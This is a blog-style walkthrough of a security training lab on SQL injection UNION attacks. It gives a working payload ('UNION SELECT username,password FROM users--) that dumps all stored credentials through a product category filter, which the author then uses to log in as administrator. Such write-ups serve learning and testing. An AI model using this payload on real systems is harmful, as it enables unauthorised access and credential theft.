09 - SQL injection UNION attack, retrieving data from other tables

This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Given : Injection point (Product category), Table name (users), Columns (username,password)
End goal : Log in as administrator user

As we know the table name , column name , username(administrator), to get the password the possible injectable query can be following - 'UNION+SELECT+username,password+FROM+users--. It gives 200 OK that means it works, if it haven't worked then we have to get the number of columns first.

In output it gives all the usernames and their passwords

Now go to my account and login with the administrator credentials to solve the lab.

Lab solved :

Prev Next

CAPA: The Basics01/02/25 ctf → thm → capa-the-basics

SQLMap: The Basics31/01/25 ctf → thm → sqlmap-the-basics

SQL Fundamentals31/01/25 ctf → thm → sql-fundamentals

Powershell30/01/25 programming → powershell